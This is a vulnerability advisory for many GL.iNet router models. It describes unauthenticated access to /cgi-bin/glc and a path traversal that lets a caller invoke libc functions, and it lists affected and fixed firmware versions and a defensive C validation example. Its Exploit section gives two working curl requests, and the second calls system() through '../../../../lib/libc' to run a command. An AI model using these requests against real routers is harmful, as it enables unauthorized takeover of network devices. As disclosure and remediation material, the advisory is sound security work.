Access to the C library without logging in

Description

This vulnerability allows direct, unauthenticated HTTP access to /cgi-bin/glc, through which a caller can execute arbitrary methods within the C library. The "glc" binary also fails to properly sanitize the JSON data it receives, so path traversal sequences such as "../" are accepted in the "object" parameter. This can lead to potential arbitrary code execution.

Affected Product

● MT6000/A1300/X300B/AX1800/AXT1800/MT2500/MT3000/X3000/XE3000/XE300/E750/X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2/AP1300/B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300

Affected Firmware Version

● MT6000: 4.5.8, fixed in 4.6.2
● A1300/X300B: 4.5.16, fixed in 4.5.17
● AX1800/AXT1800/MT2500/MT3000: 4.5.16, fixed in 4.6.2
● X3000/XE3000: 4.4.8, fixed in 4.4.9
● XE300: 4.3.16, fixed in 4.3.17
● E750: 4.3.12, fixed in 4.3.17
● X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2: 4.3.11, fixed in 4.3.17
● AP1300: 3.217, fixed in 3.218
● B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216, fixed in 3.218

Exploit

curl -v http://192.168.8.1/cgi-bin/glc --data-raw '{"object":"cable","method":"get_config"}'

curl -H 'glinet: 1' 127.0.0.1/rpc -d '{"method":"call", "params":["", "../../../../lib/libc", "system",{"command":"id"}]}'

If the path exists, it returns error code 0; if not, it returns "No such file or directory".

Impact

By combining the directory traversal with the execution of code within the C library, an attacker can execute malicious code to manipulate the router.
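
One way to validate the "object" parameter before it is turned into a library path, shown as an added example (not GL.iNet's code and not the actual firmware fix). OBJECT_DIR, the ".so" suffix and both function names are assumptions; the sample inputs are constructed from the requests above.

```c
#include <stdio.h>
#include <string.h>

/* Assumed plugin directory: the advisory does not say where glc loads objects from. */
#define OBJECT_DIR "/usr/lib/example-rpc"

/* Return 1 if name is a plain identifier: 1..64 bytes of [A-Za-z0-9_-]. */
int object_name_is_safe(const char *name)
{
    size_t len;

    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 64)
        return 0;
    /* strspn counts the leading run of allowed bytes; any '/', '.', '\\',
     * '%' or control byte ends the run early and fails the check. */
    return strspn(name, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                        "abcdefghijklmnopqrstuvwxyz"
                        "0123456789_-") == len;
}

/* Build "<OBJECT_DIR>/<name>.so" into out. Returns 0 on success, -1 if the
 * name is rejected or the result would not fit (no truncated paths). */
int build_object_path(const char *name, char *out, size_t outlen)
{
    int n;

    if (!object_name_is_safe(name))
        return -1;
    n = snprintf(out, outlen, "%s/%s.so", OBJECT_DIR, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* Constructed samples: the two "object" values from the requests above, plus edge cases. */
    const char *samples[] = { "cable", "../../../../lib/libc", "a/b", "", "wifi_2g" };
    char path[128];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (build_object_path(samples[i], path, sizeof path) == 0)
            printf("accept %-22s -> %s\n", samples[i], path);
        else
            printf("reject \"%s\"\n", samples[i]);
    }
    return 0;
}
```

An allowlist rejects the name before any path is built, so encoded or nested traversal variants never reach the loader. It does not address the missing login check on /cgi-bin/glc, which has to be enforced separately.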